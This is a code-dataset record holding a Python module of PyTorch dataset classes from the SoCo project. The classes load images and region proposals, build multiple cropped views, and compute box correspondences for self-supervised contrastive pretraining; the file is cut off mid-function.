hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
652213760a2216427e943a18b683cce58278aeb3
| 46,499
|
py
|
Python
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 80
|
2021-10-22T03:26:42.000Z
|
2022-03-31T08:45:36.000Z
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 17
|
2021-11-03T08:58:59.000Z
|
2022-03-03T13:39:47.000Z
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 14
|
2021-10-31T14:34:34.000Z
|
2022-03-10T16:30:55.000Z
|
import io
import json
import logging
import os
import time
import numpy as np
import torch
import torch.distributed as dist
import torch.utils.data as data
from PIL import Image
from .bboxs_utils import (cal_overlap_params, clip_bboxs,
get_common_bboxs_ids, get_overlap_props, get_correspondence_matrix,
pad_bboxs_with_common, bboxs_to_tensor, resize_bboxs,
assign_bboxs_to_feature_map, get_aware_correspondence_matrix, jitter_props)
from .props_utils import select_props, convert_props
from .selective_search_utils import append_prop_id
from .zipreader import ZipReader, is_zip_path
def has_file_allowed_extension(filename, extensions):
    """Check whether a file name ends in one of the allowed extensions.

    Args:
        filename (string): path to a file
        extensions (iterable[string]): allowed (lower-case) extensions
    Returns:
        bool: True if the filename ends with a known image extension
    """
    lowered = filename.lower()
    for ext in extensions:
        if lowered.endswith(ext):
            return True
    return False
def find_classes(dir):
    """List the class subdirectories of *dir*.

    Returns:
        tuple: (sorted class names, {class name: class index}) where indices
        follow the sorted order.
    """
    classes = sorted(
        entry for entry in os.listdir(dir)
        if os.path.isdir(os.path.join(dir, entry))
    )
    class_to_idx = {name: idx for idx, name in enumerate(classes)}
    return classes, class_to_idx
def make_dataset(dir, class_to_idx, extensions):
    """Scan a class-per-subdirectory tree and collect labelled samples.

    Args:
        dir (string): root directory whose immediate subdirectories are classes
        class_to_idx (dict): class name -> class index mapping
        extensions (iterable[string]): allowed file extensions
    Returns:
        list: (file path, class index) tuples in deterministic sorted order
    """
    samples = []
    dir = os.path.expanduser(dir)
    for class_name in sorted(os.listdir(dir)):
        class_dir = os.path.join(dir, class_name)
        if not os.path.isdir(class_dir):
            continue
        for walk_root, _, fnames in sorted(os.walk(class_dir)):
            samples.extend(
                (os.path.join(walk_root, fname), class_to_idx[class_name])
                for fname in sorted(fnames)
                if has_file_allowed_extension(fname, extensions)
            )
    return samples
def make_dataset_with_ann(ann_file, img_prefix, extensions, dataset='ImageNet'):
    """Build (image path, class index) pairs from an annotation file.

    Each line of *ann_file* is whitespace-separated: a relative image path
    followed by an integer class index. Paths are joined onto *img_prefix*.
    An assertion enforces that every listed file has an allowed extension.
    """
    images = []
    with open(ann_file, "r") as f:
        for line in f:
            fields = line.split()
            rel_path = fields[0]
            class_index = int(fields[1])
            assert os.path.splitext(rel_path)[-1].lower() in extensions
            images.append((os.path.join(img_prefix, rel_path), class_index))
    return images
def make_props_dataset_with_ann(ann_file, props_file, select_strategy, select_k, dataset='ImageNet', rpn_props=False, rpn_score_thres=0.5):
    """Load per-image proposals, ordered to match the annotation file.

    *props_file* is a JSON mapping of image basename (without extension) to
    raw proposals; each entry is converted via ``convert_props`` and returned
    in annotation-file order so indices line up with the sample list.

    NOTE(review): select_strategy/select_k/rpn_props/rpn_score_thres are
    accepted but unused here — presumably consumed by callers; confirm.
    """
    with open(props_file, "r") as f:
        props_dict = json.load(f)
    # make ImageNet or VOC dataset
    with open(ann_file, "r") as f:
        contents = f.readlines()
    images_props = []
    for line_str in contents:
        im_file_name = line_str.split('\t')[0]
        basename = os.path.basename(im_file_name).split('.')[0]
        images_props.append(convert_props(props_dict[basename]))  # keep all propos
    # Drop the large intermediates promptly to reduce peak memory.
    del contents
    del props_dict
    return images_props
class DatasetFolder(data.Dataset):
    """A generic data loader where the samples are arranged in this way: ::
        root/class_x/xxx.ext
        root/class_x/xxy.ext
        root/class_x/xxz.ext
        root/class_y/123.ext
        root/class_y/nsdf3.ext
        root/class_y/asd932_.ext
    Args:
        root (string): Root directory path.
        loader (callable): A function to load a sample given its path.
        extensions (list[string]): A list of allowed extensions.
        ann_file (string, optional): When non-empty, samples come from this
            annotation file (joined onto ``root``) instead of a folder scan.
        img_prefix (string, optional): Prefix (under ``root``) joined to the
            paths read from ``ann_file``.
        transform (callable, optional): A function/transform that takes in
            a sample and returns a transformed version.
            E.g, ``transforms.RandomCrop`` for images.
        target_transform (callable, optional): A function/transform that takes
            in the target and transforms it.
        cache_mode (string): "no" (default), "part" (each distributed rank
            caches only its shard of samples in memory) or "full" (every rank
            caches all samples).
        dataset (string): Dataset name forwarded to the annotation parser.
    Attributes:
        samples (list): List of (sample path, class_index) tuples
    """

    def __init__(self, root, loader, extensions, ann_file='', img_prefix='', transform=None, target_transform=None,
                 cache_mode="no", dataset='ImageNet'):
        # image folder mode
        if ann_file == '':
            _, class_to_idx = find_classes(root)
            samples = make_dataset(root, class_to_idx, extensions)
        # zip mode
        else:
            samples = make_dataset_with_ann(os.path.join(root, ann_file),
                                            os.path.join(root, img_prefix),
                                            extensions,
                                            dataset)
        if len(samples) == 0:
            raise RuntimeError("Found 0 files in subfolders of: " + root + "\n"
                               "Supported extensions are: " + ",".join(extensions))
        self.root = root
        self.loader = loader
        self.extensions = extensions
        self.samples = samples
        self.labels = [y_1k for _, y_1k in samples]
        self.classes = list(set(self.labels))
        self.transform = transform
        self.target_transform = target_transform
        self.cache_mode = cache_mode
        if self.cache_mode != "no":
            self.init_cache()

    def init_cache(self):
        """Pre-read sample bytes into memory.

        In "part" mode only every ``world_size``-th sample (this rank's shard)
        is cached as bytes; the rest keep their path. In "full" mode all
        samples are cached. Requires torch.distributed to be initialized.
        """
        assert self.cache_mode in ["part", "full"]
        n_sample = len(self.samples)
        global_rank = dist.get_rank()
        world_size = dist.get_world_size()
        samples_bytes = [None for _ in range(n_sample)]
        start_time = time.time()
        # BUGFIX: n_sample // 10 is 0 for datasets with fewer than 10 samples,
        # which made `index % (n_sample // 10)` raise ZeroDivisionError.
        log_interval = max(n_sample // 10, 1)
        for index in range(n_sample):
            if index % log_interval == 0:
                t = time.time() - start_time
                logger = logging.getLogger(__name__)
                logger.info(f'cached {index}/{n_sample} takes {t:.2f}s per block')
                start_time = time.time()
            path, target = self.samples[index]
            if self.cache_mode == "full" or index % world_size == global_rank:
                samples_bytes[index] = (ZipReader.read(path), target)
            else:
                samples_bytes[index] = (path, target)
        self.samples = samples_bytes

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (sample, target) where target is class_index of the target class.
        """
        path, target = self.samples[index]
        sample = self.loader(path)
        if self.transform is not None:
            sample = self.transform(sample)
        if self.target_transform is not None:
            target = self.target_transform(target)
        return sample, target

    def __len__(self):
        return len(self.samples)

    def __repr__(self):
        fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
        fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
        fmt_str += ' Root Location: {}\n'.format(self.root)
        tmp = ' Transforms (if any): '
        fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        tmp = ' Target Transforms (if any): '
        fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        return fmt_str
class DatasetFolderProps(data.Dataset):
    """A :class:`DatasetFolder`-style loader that also carries per-image proposals.

    In annotation mode (``ann_file`` non-empty) a proposal JSON file
    (``train_props_file``) is parsed alongside the annotation file and stored
    in ``self.samples_props``, index-aligned with ``self.samples``. Plain
    folder mode has no proposal source and is rejected with a RuntimeError.

    Args:
        root (string): Root directory path.
        loader (callable): A function to load a sample given its path.
        extensions (list[string]): A list of allowed extensions.
        ann_file (string, optional): Annotation file of tab-separated lines.
        img_prefix (string, optional): Prefix joined to annotation paths.
        train_props_file (string, optional): JSON file of per-image proposals.
        select_strategy (string) / select_k (int): forwarded to the proposal parser.
        transform / target_transform (callable, optional): sample/target transforms.
        cache_mode (string): "no", "part" or "full" in-memory caching.
        dataset (string): Dataset name forwarded to the parsers.
        rpn_props (bool) / rpn_score_thres (float): forwarded to the proposal parser.
    """

    def __init__(self, root, loader, extensions, ann_file='', img_prefix='', train_props_file='',
                 select_strategy='', select_k=0,
                 transform=None, target_transform=None,
                 cache_mode="no", dataset='ImageNet', rpn_props=False, rpn_score_thres=0.5):
        # image folder mode
        if ann_file == '':
            _, class_to_idx = find_classes(root)
            samples = make_dataset(root, class_to_idx, extensions)
            # BUGFIX: folder mode previously left samples_props unassigned,
            # so the length check below raised NameError. An empty list makes
            # the intended RuntimeError fire instead.
            samples_props = []
        # zip mode
        else:
            samples = make_dataset_with_ann(os.path.join(root, ann_file),
                                            os.path.join(root, img_prefix),
                                            extensions,
                                            dataset)
            samples_props = make_props_dataset_with_ann(os.path.join(root, ann_file),
                                                        os.path.join(root, train_props_file),
                                                        select_strategy, select_k,
                                                        dataset=dataset, rpn_props=rpn_props, rpn_score_thres=rpn_score_thres)
        if len(samples) == 0:
            raise RuntimeError("Found 0 files in subfolders of: " + root + "\n"
                               "Supported extensions are: " + ",".join(extensions))
        if len(samples_props) == 0:
            raise RuntimeError("Not found the proposal files")
        self.root = root
        self.loader = loader
        self.extensions = extensions
        self.samples = samples
        self.samples_props = samples_props
        self.labels = [y_1k for _, y_1k in samples]
        self.classes = list(set(self.labels))
        self.transform = transform
        self.target_transform = target_transform
        self.cache_mode = cache_mode
        if self.cache_mode != "no":
            self.init_cache()

    def init_cache(self):
        """Pre-read sample bytes into memory ("part" shards across ranks)."""
        assert self.cache_mode in ["part", "full"]
        n_sample = len(self.samples)
        global_rank = dist.get_rank()
        world_size = dist.get_world_size()
        samples_bytes = [None for _ in range(n_sample)]
        start_time = time.time()
        # BUGFIX: guard against ZeroDivisionError when n_sample < 10.
        log_interval = max(n_sample // 10, 1)
        for index in range(n_sample):
            if index % log_interval == 0:
                t = time.time() - start_time
                logger = logging.getLogger(__name__)
                logger.info(f'cached {index}/{n_sample} takes {t:.2f}s per block')
                start_time = time.time()
            path, target = self.samples[index]
            if self.cache_mode == "full" or index % world_size == global_rank:
                samples_bytes[index] = (ZipReader.read(path), target)
            else:
                samples_bytes[index] = (path, target)
        self.samples = samples_bytes

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (sample, target) where target is class_index of the target class.
        """
        path, target = self.samples[index]
        sample = self.loader(path)
        if self.transform is not None:
            sample = self.transform(sample)
        if self.target_transform is not None:
            target = self.target_transform(target)
        return sample, target

    def __len__(self):
        return len(self.samples)

    def __repr__(self):
        fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
        fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
        fmt_str += ' Root Location: {}\n'.format(self.root)
        tmp = ' Transforms (if any): '
        fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        tmp = ' Target Transforms (if any): '
        fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
        return fmt_str
# File extensions recognised as images by the folder/annotation scanners below.
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def pil_loader(path):
    """Load an image as RGB with PIL.

    Args:
        path: raw image bytes, a zip-archive path (see ``is_zip_path``), or a
            regular filesystem path.
    Returns:
        PIL.Image.Image: the image converted to RGB.
    """
    # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
    if isinstance(path, bytes):
        img = Image.open(io.BytesIO(path))
    elif is_zip_path(path):
        data = ZipReader.read(path)
        img = Image.open(io.BytesIO(data))
    else:
        with open(path, 'rb') as f:
            img = Image.open(f)
            # BUGFIX: Image.open is lazy; converting after the `with` closes
            # the file can raise "seek of closed file". Force the decode while
            # the file handle is still open.
            return img.convert('RGB')
    return img.convert('RGB')
def accimage_loader(path):
    """Load *path* with the accimage backend, falling back to PIL on IOError."""
    import accimage  # type: ignore
    try:
        return accimage.Image(path)
    except IOError:
        # Potentially a decoding problem, fall back to PIL.Image
        return pil_loader(path)
def default_img_loader(path):
    """Load an image using whichever backend torchvision is configured with."""
    from torchvision import get_image_backend
    backend = get_image_backend()
    if backend == 'accimage':
        return accimage_loader(path)
    return pil_loader(path)
class ImageFolder(DatasetFolder):
    """A generic data loader where the images are arranged in this way: ::
        root/dog/xxx.png
        root/dog/xxy.png
        root/dog/xxz.png
        root/cat/123.png
        root/cat/nsdf3.png
        root/cat/asd932_.png
    Args:
        root (string): Root directory path.
        transform (callable, optional): A function/transform that takes in an PIL image
            and returns a transformed version. E.g, ``transforms.RandomCrop``.
            May also be a 2-tuple of transforms: element 0 produces the first
            crop, element 1 the second (when ``two_crop`` is set).
        target_transform (callable, optional): A function/transform that takes in the
            target and transforms it.
        loader (callable, optional): A function to load an image given its path.
        two_crop (bool): also return a second transformed view of the image.
        return_coord (bool): transforms are expected to return (image, coord)
            tuples; the coords are returned alongside the images.
    Attributes:
        imgs (list): List of (image path, class_index) tuples
    """

    def __init__(self, root, ann_file='', img_prefix='', transform=None, target_transform=None,
                 loader=default_img_loader, cache_mode="no", dataset='ImageNet',
                 two_crop=False, return_coord=False):
        super().__init__(root, loader, IMG_EXTENSIONS,
                         ann_file=ann_file, img_prefix=img_prefix,
                         transform=transform, target_transform=target_transform,
                         cache_mode=cache_mode, dataset=dataset)
        self.imgs = self.samples
        self.two_crop = two_crop
        self.return_coord = return_coord

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (image, target) where target is class_index of the target class.
        """
        path, target = self.samples[index]
        image = self.loader(path)
        # A 2-tuple transform supplies a distinct transform per crop.
        paired = isinstance(self.transform, tuple) and len(self.transform) == 2
        if self.transform is None:
            img = image
        else:
            img = (self.transform[0] if paired else self.transform)(image)
        if self.target_transform is not None:
            target = self.target_transform(target)
        if self.two_crop:
            img2 = (self.transform[1] if paired else self.transform)(image)
        if self.return_coord:
            assert isinstance(img, tuple)
            img, coord = img
            if self.two_crop:
                img2, coord2 = img2
                return img, img2, coord, coord2, index, target
            return img, coord, index, target
        # Coordinates not requested: strip them if the transform produced any.
        if isinstance(img, tuple):
            img, coord = img
        if self.two_crop:
            if isinstance(img2, tuple):
                img2, coord2 = img2
            return img, img2, index, target
        return img, index, target
class ImageFolderImageAsymBboxCutout(DatasetFolderProps):
    """Two-view proposal-aware dataset with cutout applied to the second view.

    View 1 is a whole-image resize and view 2 a random resized crop. Selective
    search proposals that fall in the overlap of the two views are selected,
    clipped to each view, padded up to ``padding_k`` boxes, and a box-level
    correspondence matrix between the views is returned with the images.
    """
    def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
                 image_size=0, select_strategy='', select_k=0, weight_strategy='',
                 jitter_ratio=0.0, padding_k='', aware_range=[], aware_start=0, aware_end=4,
                 max_tries=0,
                 transform=None, target_transform=None,
                 loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
        # NOTE(review): padding_k defaults to '' but is used with `//` below,
        # and aware_range=[] is a shared mutable default — confirm callers
        # always pass real values.
        super(ImageFolderImageAsymBboxCutout, self).__init__(root, loader, IMG_EXTENSIONS,
                                                             ann_file=ann_file, img_prefix=img_prefix,
                                                             train_props_file=train_props_file,
                                                             select_strategy=select_strategy, select_k=select_k,
                                                             transform=transform, target_transform=target_transform,
                                                             cache_mode=cache_mode, dataset=dataset)
        self.imgs = self.samples
        self.props = self.samples_props  # per-image proposal arrays, index-aligned with samples
        self.select_strategy = select_strategy
        self.select_k = select_k
        self.weight_strategy = weight_strategy
        self.jitter_ratio = jitter_ratio
        self.padding_k = padding_k  # number of boxes per view after padding
        self.view_size = (image_size, image_size)
        self.debug = False
        self.max_tries = max_tries  # retry budget for sampling crops with enough common proposals
        self.least_common = max(self.padding_k // 2, 1)
        self.aware_range = aware_range
        assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
        self.aware_start = aware_start  # starting from 0 means use p2
        self.aware_end = aware_end  # end, if use P6 might be 5

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (img1, img2_cutout, bboxs, bboxs2, correspondence, index, target)
            where the two box sets are normalized to (0, 1) coordinates.
        """
        path, target = self.samples[index]
        image = self.loader(path)
        image_size = image.size
        image_proposals = self.props[index]  # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
        if image_proposals.shape[0] == 0:  # if no proposals, insert one single proposal, the whole raw image
            image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
        image_proposals_w_id = append_prop_id(image_proposals)  # start from 1
        assert len(self.transform) == 6
        # transform = (transform_whole_img, transform_img, transform_flip, transform_post_1, transform_post_2, transform_cutout)
        tries = 0
        least_common = self.least_common
        # Re-sample both views until enough proposals land in their overlap,
        # halving the requirement after each failed attempt.
        # NOTE(review): max_tries == 0 would leave selected_image_props
        # unbound below — confirm callers always pass max_tries >= 1.
        while tries < self.max_tries:
            img, params = self.transform[0](image)  # whole image resize
            img2, params2 = self.transform[1](image)  # random crop resize
            params_overlap = cal_overlap_params(params, params2)
            overlap_props = get_overlap_props(image_proposals_w_id, params_overlap)
            selected_image_props = select_props(overlap_props, self.select_strategy, self.select_k)  # check paras are
            # TODO: ensure clipped bboxs width and height are greater than 32
            if selected_image_props.shape[0] >= least_common:  # ok
                break
            least_common = max(least_common // 2, 1)
            tries += 1
        bboxs = clip_bboxs(selected_image_props, params[0], params[1], params[2], params[3])
        bboxs2 = clip_bboxs(selected_image_props, params2[0], params2[1], params2[2], params2[3])
        common_bboxs_ids = get_common_bboxs_ids(bboxs, bboxs2)
        # Pad each view up to padding_k boxes using boxes common to both views.
        pad1 = self.padding_k - bboxs.shape[0]
        if pad1 > 0:
            # pad_bboxs = jitter_bboxs(bboxs, common_bboxs_ids, self.jitter_ratio, pad1, params[2], params[3])
            pad_bboxs = pad_bboxs_with_common(bboxs, common_bboxs_ids, self.jitter_ratio, pad1, params[2], params[3])
            bboxs = np.concatenate([bboxs, pad_bboxs], axis=0)
        pad2 = self.padding_k - bboxs2.shape[0]
        if pad2 > 0:
            # pad_bboxs2 = jitter_bboxs(bboxs2, common_bboxs_ids, self.jitter_ratio, pad2, params2[2], params2[3])
            pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids, self.jitter_ratio, pad2, params2[2], params2[3])
            bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
        correspondence = get_correspondence_matrix(bboxs, bboxs2)
        # Integer pixel boxes in view coordinates, used by the cutout transform.
        resized_bboxs = resize_bboxs(bboxs, params[2], params[3], self.view_size)
        resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
        resized_bboxs = resized_bboxs.astype(int)
        resized_bboxs2 = resized_bboxs2.astype(int)
        bboxs = bboxs_to_tensor(bboxs, params)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        bboxs2 = bboxs_to_tensor(bboxs2, params2)  # x1y1x2y2 -> x1y1x2y2 (0, 1)
        img, bboxs, params = self.transform[2](img, bboxs, params)  # flip
        img2, bboxs2, params2 = self.transform[2](img2, bboxs2, params2)
        img1_1x = self.transform[3](img)  # color
        img2_1x = self.transform[4](img2)  # color
        img2_1x_cut = self.transform[5](img2_1x, resized_bboxs2)  # cutout
        return img1_1x, img2_1x_cut, bboxs, bboxs2, correspondence, index, target
class ImageFolderImageAsymBboxAwareMultiJitter1(DatasetFolderProps):
    """Three-view proposal-aware dataset with FPN-level-aware correspondences.

    View 1 is a whole-image resize, view 2 a random crop, view 3 a smaller
    random crop (half resolution). Proposals in the 1-2 and 1-3 overlaps are
    selected, jittered (view-1 copies only), padded to ``padding_k`` boxes,
    assigned to feature-pyramid levels via ``aware_range``, and level-aware
    correspondence matrices for pairs (1,2) and (1,3) are returned.
    """
    def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
                 image_size=0, select_strategy='', select_k=0, weight_strategy='',
                 jitter_prob=0.0, jitter_ratio=0.0,
                 padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
                 transform=None, target_transform=None,
                 loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
        # NOTE(review): padding_k defaults to '' but is used with `//` below,
        # and aware_range=[] is a shared mutable default — confirm callers
        # always pass real values.
        super(ImageFolderImageAsymBboxAwareMultiJitter1, self).__init__(root, loader, IMG_EXTENSIONS,
                                                                        ann_file=ann_file, img_prefix=img_prefix,
                                                                        train_props_file=train_props_file,
                                                                        select_strategy=select_strategy, select_k=select_k,
                                                                        transform=transform, target_transform=target_transform,
                                                                        cache_mode=cache_mode, dataset=dataset)
        self.imgs = self.samples
        self.props = self.samples_props  # per-image proposal arrays, index-aligned with samples
        self.select_strategy = select_strategy
        self.select_k = select_k
        self.weight_strategy = weight_strategy
        self.jitter_prob = jitter_prob
        self.jitter_ratio = jitter_ratio
        self.padding_k = padding_k  # number of boxes per view after padding
        self.view_size = (image_size, image_size)
        self.view_size_3 = (image_size//2, image_size//2)  # half-size third view
        self.debug = False
        self.max_tries = max_tries  # retry budget for sampling crops with enough common proposals
        self.least_common = max(self.padding_k // 2, 1)
        self.aware_range = aware_range
        assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
        self.aware_start = aware_start  # starting from 0 means use p2
        self.aware_end = aware_end  # end, if use P6 might be 5

    def __getitem__(self, index):
        """
        Args:
            index (int): Index
        Returns:
            tuple: (img1, img2, img3, bboxs1_12, bboxs1_13, bboxs2, bboxs3,
            aware_corres_12, aware_corres_13, index, target); box coordinates
            are normalized to (0, 1).
        """
        path, target = self.samples[index]
        image = self.loader(path)
        image_size = image.size
        image_proposals = self.props[index]  # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
        if image_proposals.shape[0] == 0:  # if no proposals, insert one single proposal, the whole raw image
            image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
        image_proposals_w_id = append_prop_id(image_proposals)  # start from 1
        assert len(self.transform) == 7
        # transform = (transform_whole_img, transform_img, transform_img_small, transform_flip_flip, transform_flip, transform_post_1, transform_post_2)
        tries = 0
        least_common = self.least_common
        # Re-sample all three views until both overlaps contain enough
        # proposals, halving the requirement after each failed attempt.
        # NOTE(review): max_tries == 0 would leave the selected_image_props*
        # names unbound below — confirm callers always pass max_tries >= 1.
        while tries < self.max_tries:
            img, params = self.transform[0](image)  # whole image resize
            img2, params2 = self.transform[1](image)  # random crop resize
            img3, params3 = self.transform[2](image)  # small random crop resize
            params_overlap12 = cal_overlap_params(params, params2)
            overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
            selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k)  # check paras are
            params_overlap13 = cal_overlap_params(params, params3)
            overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
            selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k)  # check paras are
            # TODO: ensure clipped bboxs width and height are greater than 32
            if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common:  # ok
                break
            least_common = max(least_common // 2, 1)
            tries += 1
        # Jitter only the view-1 copies of the boxes; views 2/3 keep originals.
        jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
        jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
        bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
        bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
        bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
        bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
        common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
        common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
        # Pad every box set up to padding_k using boxes common to its pair.
        pad1_12 = self.padding_k - bboxs1_12.shape[0]
        if pad1_12 > 0:
            pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
            bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
        pad1_13 = self.padding_k - bboxs1_13.shape[0]
        if pad1_13 > 0:
            pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
